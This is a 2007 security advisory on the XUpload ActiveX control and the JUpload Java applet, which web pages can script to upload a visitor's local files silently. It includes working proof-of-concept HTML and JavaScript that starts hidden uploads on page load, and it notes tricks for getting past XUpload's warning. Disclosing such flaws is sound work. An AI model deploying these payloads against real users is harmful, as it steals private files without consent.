XUpload/JUpload arbitrary file upload


Yorick Koster, June 2007

Abstract


XUpload and JUpload allow attackers to upload arbitrary files from users' systems to a server of the attacker's choosing. This potentially gives attackers access to sensitive information stored on those systems.

Fix


There is currently no fix available. As of XUpload version 3.0, XUpload displays a warning message to the end user when a web site tries to upload files from the user's system. JUpload displays no such warning.

Introduction


The XUpload ActiveX control is a client-side component that can be loaded in Internet Explorer. XUpload is used to upload arbitrary files to a web server. It is used to overcome some of the limitations of the browser's regular upload functionality (<input type="file" ...>): XUpload allows uploading multiple files at once and even entire directories, recursively. XUpload is marked "Safe for scripting" and "Safe for initialization", so any web page can instantiate it and call its methods.

JUpload is the Java equivalent of XUpload. Since XUpload is an ActiveX control, it only works in Internet Explorer. JUpload is implemented as a Java applet and thus works in any browser that supports and has a Java plugin installed. JUpload is a signed applet; this is required because applets normally run in a very restricted sandbox, and JUpload needs to access local files. The signature causes JUpload to run with fewer restrictions. Before JUpload is started, users are required to accept the applet. In Sun's Java implementation the "Always trust content from this publisher" check box is checked by default. If the user chooses "Run" with this option checked, the JVM will not warn the user about future applets signed by Persits.

XUpload, arbitrary file upload


Normally, the user selects the files to upload. Next, the user initiates the file upload by right-clicking in XUpload, which displays a context menu containing an "Upload" option. The upload is started by clicking this option.

/advisory/AK20070602/001_initiate_file_upload_context_menu.png
Figure 1: Initiate file upload through context menu

Web site developers can also initiate an upload automatically using the Upload() method. Using the AddFile(Path As String) and AddFolder(Folder As String, Optional Recursive = False) methods, or the FileN parameters (File1, File2, ...), it is also possible to select the files and/or folders to upload without involving the user. The Server and Script parameters determine the target to which the files are uploaded. Combining these, a malicious page can upload any file from the user's system to any server without any user interaction. Proof of concept:

<!-- Invisible instance of the control; Server and Script select the
     attacker's upload target, File1 preselects a local file -->
<object width="0" height="0" id="XUpload" name="XUpload"
   classid="CLSID:E87F6C8E-16C0-11D3-BEF7-009027438003" codebase="XUpload.ocx">
<param name="Server" value="localhost">
<param name="Script" value="upload.php">
<param name="ViewServerReply" value="True">
<param name="File1" value="C:\WINDOWS\ie7.log">
</object>
<script type="text/javascript">
function StartUpload()
{
   // Replace the preselected list with a file and a whole folder,
   // then start the transfer without any user action
   document.XUpload.RemoveAll();
   document.XUpload.AddFile('C:\\WINDOWS\\ie7.log');
   document.XUpload.AddFolder('C:\\Documents and Settings\\All Users\\Desktop');
   document.XUpload.Upload();
}
window.onload = StartUpload;
</script>


Recent versions of XUpload display a warning to the end user (Figure 2). The target URL does not appear to be displayed correctly when it is too long for the reserved label, so a long URL can hide the real destination. This functionality was added in XUpload version 3.0 (released August 10th, 2006); the release notes state:

"Improved security. A user is asked for a confirmation before the upload begins."

This warning may alert security-aware users and thus makes the upload functionality less useful for large-scale attacks. The warning message contains a check box "Do not ask me again when uploading to this URL". If the target user checks this check box, the message box is not displayed for future uploads to that URL. Using social engineering, it may be possible to convince the target user to check this check box. XUpload stores a list of hashes of the URLs trusted by the end user in the Windows registry; each hash represents a unique URL. In addition, this warning is only displayed to users that have a recent version of XUpload installed; older versions upload silently.

/advisory/AK20070602/002_file_upload_warning.png
Figure 2: XUpload ActiveX control file upload warning

JUpload, arbitrary file upload


JUpload offers functionality similar to XUpload's, so it is also possible to upload arbitrary files to third-party servers. A big difference from XUpload is that JUpload does not display a warning to end users when it is instructed to upload files. Thus, once the signed applet has been accepted (or the publisher was trusted earlier), files are uploaded almost silently. Proof of concept:

<!-- Invisible applet; UploadURL selects the attacker's target and
     File1 preselects a local file -->
<applet id="JUpload" name="JUpload" width="0" height="0" archive="JUpload.jar" code="persits.transfer.gui.UploadUI.class">
<param name="cabbase" value="JUpload.cab">
<param name="UploadURL" value="upload.php">
<param name="DebugInformation" value="True">
<param name="File1" value="C:\Documents and Settings\All Users\ntuser.dat.LOG">
</applet>
<script type="text/javascript">
// Poll until the applet has loaded, then start the transfer without
// any user action
function waitForInit()
{
   if (document.JUpload.isInitialized())
   {
      document.JUpload.startTransfer();
   }
   else
   {
      window.setTimeout('waitForInit()', 200);
   }
}

waitForInit();
</script>